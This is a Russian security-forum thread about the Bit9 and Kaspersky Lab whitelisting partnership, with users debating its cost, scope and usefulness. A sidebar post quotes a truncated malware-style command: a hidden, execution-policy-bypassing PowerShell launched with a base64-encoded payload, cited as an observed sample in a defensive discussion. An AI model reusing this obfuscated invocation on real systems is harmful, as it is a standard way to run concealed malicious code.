Перейти к содержанию
A.

Bit9 и Kaspersky Lab подписали партнерское соглашение

Recommended Posts

Кирилл Керценбаум

A.

Правильно ли я понимаю что только whitelist технология будет использоваться? А Application и Device Control?

Хорошая тема, может и ЛК в итоге прикупит эту компанию, видимо пришло понимание что новые инновационные технологии сейчас разрабатывать дорого и долго, а времени то как раз и нет, новые технологии проще покупать

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
grovana
Хорошая тема, может и ЛК в итоге прикупит эту компанию, видимо пришло понимание что новые иновационные технологии сейчас разрабатывать дорого и долго, а времени то как раз и нет, новые технологии проще покупать

То, что Вы называетет "дорогой иновационной технологией" может внедрить любая приличная антивирусная компания с достойной коллекцией safe-samples за месяц, с изменениями движка, с добавлением баз и тестированием. Другое дело, что никто из антивирусных вендоров до Bit9 не проникся этой простой и гениальной идеей, хотя в "фаерволах" она используется повсеместно и давно.

Простого юзера этим не защитишь - все равно натащит кучу пакованных шаровар из инета и будет разрешать все подряд. Для серверных станций, куда левый софт вообще попадает крайне редко, это решение самое оно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
_Stout
Хорошая тема, может и ЛК в итоге прикупит эту компанию, видимо пришло понимание что новые иновационные технологии сейчас разрабатывать дорого и долго, а времени то как раз и нет, новые технологии проще покупать

То, что Вы называетет "дорогой иновационной технологией" может внедрить любая приличная антивирусная компания с достойной коллекцией safe-samples за месяц, с изменениями движка, с добавлением баз и тестированием. Другое дело, что никто из антивирусных вендоров до Bit9 не проникся этой простой и гениальной идеей, хотя в "фаерволах" она используется повсеместно и давно.

Коллега, позволю с вами не согласится -- стоимость входа на рынок Whitelisting довольно высока и пример Bit9 тому показатель -- подавляющее большинство компаний вместо того, чтобы "внедрить за месяц" договариваются с Bit9.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Насколько я знаю Bit9 потратила на создание своего Whitelisting довольно большой гранд - несколько миллионов долларов. В основном все пошло на инфраструктуру.

In July 2003, Bit9 was awarded a prestigious $2M federal research grant from the National Institute of Standards and Technology-Advanced Technology Program (NIST ATP).

http://www.bit9.com/about/overview.php

Так что развернуть такое могут многие, но далеко не все, так как инвестиции на инфрастуктуру значительные.

Простого юзера этим не защитишь - все равно натащит кучу пакованных шаровар из инета и будет разрешать все подряд. Для серверных станций, куда левый софт вообще попадает крайне редко, это решение самое оно.

Готов согласиться с этим. Так как Bit9 не собирает всякую мелочь и нераспространенный софт по инету. Кроме этого от него ускользает и та чать софта, которая не доступна для публичного скачивания.

Крупняк типа диструбутивов Microsoft, Oracle и т.д. к ним попадает, но какой это процент от всех чистых файлов инета? :?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
grovana
In July 2003, Bit9 was awarded a prestigious $2M federal research grant from the National Institute of Standards and Technology-Advanced Technology Program (NIST ATP).

думал, такое только в наших краях прокатит...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lex
А это, наверное, от части ответ на мой вопрос о DLP и ЛК из соседнего поста? =)

А каким боком это к DLP вообще?..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
А это, наверное, от части ответ на мой вопрос о DLP и ЛК из соседнего поста? =)

А каким боком это к DLP вообще?..

Device Control...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lex

Kaspersky Lab plans to combine Bit9’s innovative whitelisting technology into some of the future product offerings

нету тут ничего про device control...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×